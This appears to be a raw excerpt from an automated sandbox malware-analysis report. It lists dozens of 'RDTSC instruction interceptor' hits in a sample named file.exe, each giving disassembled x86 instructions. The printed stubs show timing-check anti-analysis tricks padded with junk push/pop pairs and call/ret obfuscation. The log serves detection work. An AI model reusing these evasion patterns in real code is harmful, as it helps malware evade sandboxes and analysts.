                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38502 second address: D38538 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D34B708FCh 0x0000000c jng 00007F0D34B708F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F0D34B708FBh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38538 second address: D38541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38693 second address: D38699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E36C second address: D2E374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E374 second address: D2E380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E380 second address: D2E394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E394 second address: D2E398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E398 second address: D2E3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3A4 second address: D2E3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3AA second address: D2E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3B0 second address: D2E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B4D8 second address: D0B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B4E7 second address: D0B4F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38819 second address: D3882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC1h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E05 second address: D38E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E09 second address: D38E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390B0 second address: D390B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390B6 second address: D390BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390BA second address: D390D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390D3 second address: D390F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0D344F4ABCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F0D344F4ABAh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390F7 second address: D39103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39103 second address: D39108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40FE3 second address: D40FF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0D34B708F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F850 second address: D3F85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41151 second address: D41156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41303 second address: D41307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41307 second address: D4130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44F52 second address: D44F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0D344F4AC0h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4449F second address: D444AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D444AA second address: D444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44784 second address: D44788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44DD1 second address: D44DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44DD5 second address: D44DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0D34B708FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AFF second address: D47B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 jns 00007F0D344F4AC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B1C second address: D47B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DAF second address: D47DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DB4 second address: D47DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D34B708F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F0D34B708FCh 0x00000016 jns 00007F0D34B708F6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FD6 second address: D47FF9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D344F4AC3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FF9 second address: D47FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FFD second address: D48003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487CF second address: D487F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487F2 second address: D487F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487F6 second address: D487FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48A6A second address: D48A74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C03 second address: D48C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B708FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F0D34B708FAh 0x00000015 ja 00007F0D34B708F6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C2B second address: D48C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C31 second address: D48C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C35 second address: D48C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0D344F4AB8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jg 00007F0D344F4ABCh 0x00000029 sub esi, dword ptr [ebp+122D36CDh] 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F0D344F4AC1h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C86 second address: D48CBD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D34B7090Eh 0x00000008 jmp 00007F0D34B70908h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0D34B708FBh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48CBD second address: D48CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49229 second address: D4922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4922D second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49231 second address: D49289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F0D34B708FCh 0x0000000e call 00007F0D34B708FBh 0x00000013 jmp 00007F0D34B708FCh 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push ebx 0x0000001c mov di, ax 0x0000001f pop edi 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 jmp 00007F0D34B70908h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49289 second address: D49292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49292 second address: D49296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49BFD second address: D49C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4ABAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49AA5 second address: D49AB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0D34B708F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49C0F second address: D49C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F0D344F4AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0D344F4AB8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0D344F4AB8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D30A0h] 0x0000004d xchg eax, ebx 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49C72 second address: D49C83 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B5E9 second address: D4B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0D344F4AB8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1800h], edx 0x0000002c push 00000000h 0x0000002e jmp 00007F0D344F4ABFh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 push edi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BEEB second address: D4BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BEEF second address: D4BEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BEFE second address: D4BF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0D34B708F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0D34B708F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BF16 second address: D4BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BF1A second address: D4BF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D34B708FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BF2F second address: D4BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F0D344F4AB8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1969h], ecx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D39CDh] 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 xor dword ptr [ebp+122D23FEh], edx 0x00000038 pop edi 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BF74 second address: D4BF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BF78 second address: D4BF85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4C7C5 second address: D4C7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51CC1 second address: D51D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 nop 0x00000011 mov dword ptr [ebp+12458732h], ebx 0x00000017 push 00000000h 0x00000019 call 00007F0D344F4AC9h 0x0000001e mov dword ptr [ebp+12444A28h], edx 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F0D344F4AB8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push esi 0x00000046 pushad 0x00000047 popad 0x00000048 pop esi 0x00000049 push eax 0x0000004a jnp 00007F0D344F4AB6h 0x00000050 pop eax 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F0D344F4AB6h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51D56 second address: D51D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52B71 second address: D52B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51EA4 second address: D51EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51EB0 second address: D51EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51EB4 second address: D51EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D51EBD second address: D51F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sub bh, FFFFFFB5h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bl, 22h 0x00000034 mov eax, dword ptr [ebp+122D0701h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F0D344F4AB8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 mov dword ptr [ebp+122D243Eh], ecx 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 jnl 00007F0D344F4AB6h 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53AA6 second address: D53AB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53AB0 second address: D53AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52D9C second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52DA1 second address: D52DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4ABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52DB1 second address: D52DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F0D34B708F6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D34B70907h 0x0000001b rdtsc
